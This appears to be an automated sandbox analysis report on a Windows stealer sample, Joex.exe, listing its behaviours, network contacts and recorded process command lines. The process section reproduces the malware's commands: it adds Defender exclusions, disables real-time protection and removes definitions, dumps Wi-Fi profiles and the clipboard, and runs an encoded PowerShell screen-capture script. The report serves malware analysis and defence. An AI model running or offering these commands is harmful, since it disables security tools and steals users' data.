Analysis Overview
SHA256
42387aec3b3fbcc123e64ff3180be6f8dbdd856f9c3a59a4a8456e2fd589062d
Threat Level: Likely malicious
The file Joex.exe was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
UPX packed file
Modifies WinLogon
Looks up external IP address via web service
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Enumerates processes with tasklist
Gathers system information
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-12 04:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-12 04:26
Reported
2024-03-12 04:28
Platform
android-x64-arm64-20240221-en
Max time network
6s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.200.14:443 | tcp | |
| GB | 142.250.200.14:443 | tcp | |
| GB | 142.250.200.14:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.180.10:443 | udp | |
| GB | 216.58.213.14:443 | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-12 04:26
Reported
2024-03-12 04:32
Platform
macos-20240214-en
Max time kernel
180s
Max time network
260s
Command Line
Signatures
Processes
/usr/libexec/xpcproxy
[xpcproxy com.apple.pluginkit.pkd]
/usr/libexec/pkd
[/usr/libexec/pkd]
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/Joex.exe"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/Joex.exe"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/Joex.exe]
/bin/zsh
[/bin/zsh -c /Users/run/Joex.exe]
/Users/run/Joex.exe
[/Users/run/Joex.exe]
/usr/libexec/xpcproxy
[xpcproxy com.apple.secinitd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.sysmond]
/usr/libexec/sysmond
[/usr/libexec/sysmond]
/usr/libexec/secinitd
[/usr/libexec/secinitd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.systemsoundserverd]
/usr/sbin/systemsoundserverd
[/usr/sbin/systemsoundserverd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.pbs]
/System/Library/CoreServices/pbs
[/System/Library/CoreServices/pbs]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.AudioComponentRegistrar]
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
[/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon]
/usr/bin/pluginkit
[/usr/bin/pluginkit -e ignore -i com.microsoft.OneDrive.FinderSync]
/usr/sbin/spctl
[/usr/sbin/spctl --assess --type execute /var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/OneDriveUpdater6BDB2703/OneDrive.app]
/usr/libexec/xpcproxy
[xpcproxy com.apple.icloud.findmydeviced]
/usr/libexec/findmydeviced
[/usr/libexec/findmydeviced]
/usr/libexec/xpcproxy
[xpcproxy com.apple.tailspind]
/usr/libexec/tailspind
[/usr/libexec/tailspind]
/usr/libexec/xpcproxy
[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]
/usr/libexec/xpcproxy
[xpcproxy com.apple.newsyslog]
/usr/sbin/newsyslog
[/usr/sbin/newsyslog]
Network
| Country | Destination | Domain | Proto |
| GB | 17.253.29.204:80 | tcp | |
| US | 8.8.8.8:53 | 24-courier.push.apple.com | udp |
| US | 8.8.8.8:53 | mobile.events.data.trafficmanager.net | udp |
| FR | 40.79.141.154:443 | tcp | |
| GB | 17.250.81.66:443 | tcp | |
| US | 8.8.8.8:53 | apis.apple.map.fastly.net | udp |
| US | 8.8.8.8:53 | cds.apple.com | udp |
| RO | 82.78.25.240:443 | cds.apple.com | tcp |
| US | 8.8.8.8:53 | help.apple.com | udp |
| GB | 23.44.233.108:443 | help.apple.com | tcp |
| GB | 23.44.233.108:443 | help.apple.com | tcp |
| N/A | 224.0.0.251:5353 | udp |
Files
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db
| MD5 | d3a1859e6ec593505cc882e6def48fc8 |
| SHA1 | f8e6728e3e9de477a75706faa95cead9ce13cb32 |
| SHA256 | 3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c |
| SHA512 | ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db
| MD5 | 0e4a0d1ceb2af6f0f8d0167ce77be2d3 |
| SHA1 | 414ba4c1dc5fc8bf53d550e296fd6f5ad669918c |
| SHA256 | cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030 |
| SHA512 | 1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-12 04:26
Reported
2024-03-12 04:28
Platform
debian12-mipsel-20240221-en
Max time kernel
2s
Command Line
Signatures
Processes
/tmp/Joex.exe
[/tmp/Joex.exe]
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-12 04:26
Reported
2024-03-12 04:29
Platform
win10v2004-20240226-en
Max time kernel
59s
Max time network
100s
Command Line
Signatures
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Joex.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI4362\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\icon.ico" | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{FCE11A60-4362-48D7-A545-5CC9E8D12E76} | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Joex.exe
"C:\Users\Admin\AppData\Local\Temp\Joex.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe
"C:\Users\Admin\AppData\Local\Temp\DEAD JOEX.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIA